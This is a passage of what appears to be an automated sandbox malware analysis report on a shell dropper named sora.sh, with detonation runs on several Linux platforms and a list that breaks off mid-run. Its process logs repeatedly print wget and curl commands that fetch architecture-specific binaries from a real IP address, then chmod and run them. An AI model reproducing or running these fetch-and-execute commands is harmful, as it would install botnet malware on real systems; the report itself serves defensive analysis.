Malware Analysis Report

2025-01-23 15:01

Sample ID 240829-zdfznssapp
Target sora.sh
SHA256 c4575e4be3ce1429bf36332d68ad7aa6612852748f0a94067e6936433c26f344
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

c4575e4be3ce1429bf36332d68ad7aa6612852748f0a94067e6936433c26f344

Threat Level: Shows suspicious behavior

The file sora.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-29 20:35

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-29 20:35

Reported

2024-08-29 20:38

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

4s

Max time network

133s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.x86]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.mips]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.i468]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.i686]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm4]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm5]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm6]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm7]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.ppc]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.m68k]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.sh4]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
GB 195.181.164.17:443 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-29 20:35

Reported

2024-08-29 20:38

Platform

debian9-armhf-20240611-en

Max time kernel

31s

Max time network

35s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.x86]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.mips]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.i468]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.i686]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm4]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm5]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm6]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm7]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.ppc]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.m68k]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.sh4]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-29 20:35

Reported

2024-08-29 20:36

Platform

debian9-mipsbe-20240729-en

Max time kernel

31s

Max time network

32s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.x86]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.mips]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.i468]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.i686]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm4]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm5]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm6]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm7]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.ppc]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.m68k]

/usr/bin/curl

